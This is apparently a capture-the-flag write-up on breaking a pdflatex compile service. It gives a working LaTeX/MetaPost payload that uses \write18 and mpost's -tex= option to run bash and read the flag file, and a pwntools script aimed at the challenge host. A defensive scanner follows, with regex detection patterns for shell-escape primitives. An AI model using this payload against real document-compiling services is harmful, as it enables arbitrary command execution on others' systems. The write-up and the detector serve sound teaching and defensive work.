Category: Misc
Points: 75
Just a tiny application, that lets the user write some files and compile them with pdflatex.
What can possibly go wrong?
nc 78.46.224.91 24242
So this is a service that lets us create, show and compile files. It offers three commands:
- create: Create a file. Valid file formats are .log, .tex, .mp, .sty and .bib (the original listing reads ".mb", but the exploit below creates the file with "create mp", so .mp is the format the service accepts).
- show: Show the file content.
- compile: Compile a file with the pdflatex command.
We started by googling the keyword “pdflatex exploit”, and teammate mike found a useful link: Pwning coworkers thanks to LaTeX
Basically we just need to follow the method described in that post. The idea is that \write18 lets a document run a shell command, and mpost accepts a -tex= option naming the "TeX" program it should spawn, so pointing that option at bash turns a MetaPost run into arbitrary command execution. \write18 is only available when pdflatex runs with shell escape enabled; mpost is the program of choice because at the time it was on pdflatex's default restricted shell-escape whitelist, so the trick does not even need --shell-escape. The steps:
- Create a .mp file (the MetaPost input that mpost will be told to process).
- Create a .tex file with the malicious content. Here we change the command to (cat${IFS}$(ls|grep${IFS}33C3))>qqq.log, which cats whichever file in the working directory has 33C3 in its name (the flag) and stores the content in qqq.log, a file type the service will happily show us. ${IFS} is used instead of literal spaces so that the script handed to bash -c contains no whitespace of its own, which would otherwise be split off before bash sees it.
- Compile the .tex file. This makes pdflatex execute our command.
- Show the qqq.log file and get the flag.
Here’s our final exploit:
sss.mp:
verbatimtex
\documentclass{minimal}\begin{document}
etex beginfig (1) label(btex blah etex, origin);
endfig; \end{document} bye
aaa.tex:
\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (cat${IFS}$(ls|grep${IFS}33C3))>qqq.log" "sss.mp"}
\end{document}
from pwn import *

HOST, PORT = "78.46.224.91", 24242


def upload(r, kind, name, path):
    """Create <name>.<kind> on the service and feed it the lines of a local file.
    The service reads lines until it gets a line containing only \\q."""
    log.info("creating %s.%s..." % (name, kind))
    r.sendlineafter(b">", ("create %s %s" % (kind, name)).encode())
    r.recvline()
    with open(path, "rb") as f:
        for line in f:
            r.sendline(line.strip())
    r.sendline(b"\\q")  # end-of-input marker expected by the service


r = remote(HOST, PORT)
upload(r, "mp", "sss", "sss.mp")      # MetaPost file that mpost will process
upload(r, "tex", "aaa", "aaa.tex")    # \write18 payload: mpost -tex=bash -c ...
r.sendlineafter(b">", b"compile aaa")   # pdflatex runs the payload; flag lands in qqq.log
r.sendlineafter(b">", b"show log qqq")  # read the captured flag back
r.interactive()
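As an added example, not part of the original writeup and not the challenge authors' code, here is the check the service operator could have run over uploaded files before handing them to pdflatex: it flags the primitives this attack relies on (\write18, a piped \input or \openin, an mpost call carrying -tex=, and an explicit shell-escape flag), pulls the -tex= value out of the payload, and expands the ${IFS} trick so the analyst sees the real shell command. The sample documents are inline copies constructed for the example, and the pattern labels are names chosen here for the report, not TeX terminology.

```python
import re

# Constructed sample inputs: an inline copy of the writeup's aaa.tex payload
# and a harmless document, as the upload service would receive them.
AAA_TEX = r"""\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (cat${IFS}$(ls|grep${IFS}33C3))>qqq.log" "sss.mp"}
\end{document}
"""

BENIGN_TEX = r"""\documentclass{article}
\begin{document}
Nothing to see here, just \textbf{text}.
\end{document}
"""

# Primitives and flags that reach a shell once pdflatex runs with shell escape.
# The labels are chosen here for the report (assumption), not TeX terminology.
SHELL_ESCAPE_PATTERNS = {
    "write18": re.compile(r"\\write\s*18\b"),                  # \write18{...}
    "input_pipe": re.compile(r"\\(?:input|openin)\s*\|"),      # \input|cmd, \openin|cmd
    "mpost_tex_flag": re.compile(r"\bmpost\b.*?-tex="),        # mpost told to use another "TeX"
    "shell_escape_flag": re.compile(r"--?shell-escape\b"),     # explicit shell escape request
}


def find_shell_escape(text):
    """Scan TeX/MetaPost source line by line; return (line_no, label) for every hit."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        for label, pat in SHELL_ESCAPE_PATTERNS.items():
            if pat.search(line):
                hits.append((no, label))
    return hits


def extract_tex_command(text):
    """Return the value passed to mpost's -tex= option, or None if absent."""
    m = re.search(r'"-tex=([^"]*)"', text)   # quoted form, as in the payload
    if m is None:
        m = re.search(r"-tex=(\S+)", text)   # bare form, ends at whitespace
    return m.group(1) if m else None


def expand_ifs(cmd):
    """Render ${IFS} / $IFS as a single space.

    bash expands it to the IFS characters (space, tab, newline), which act as
    word separators, so this is how the command reads once bash has parsed it.
    """
    return re.sub(r"\$\{IFS\}|\$IFS\b", " ", cmd)


def triage(text):
    """Analyst summary for one uploaded file: pattern hits plus the decoded command."""
    report = {"hits": find_shell_escape(text), "shell_command": None}
    raw = extract_tex_command(text)
    if raw is not None:
        report["shell_command"] = expand_ifs(raw)
    return report


if __name__ == "__main__":
    for name, src in (("aaa.tex", AAA_TEX), ("benign.tex", BENIGN_TEX)):
        print(name, triage(src))
```

Run against the writeup's aaa.tex the triage reports two hits on line 2 and decodes the -tex= value to bash -c (cat $(ls|grep 33C3))>qqq.log; the benign document produces no hits. A regex scan like this is a useful tripwire, but it is no substitute for running pdflatex with shell escape off (or with a whitelist that does not include a program able to spawn arbitrary commands), because TeX macros can assemble \write18 from pieces the patterns will not match.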
Don’t take LaTeX files from strangers!!
flag: 33C3_pdflatex_1s_t0t4lly_s3cur3!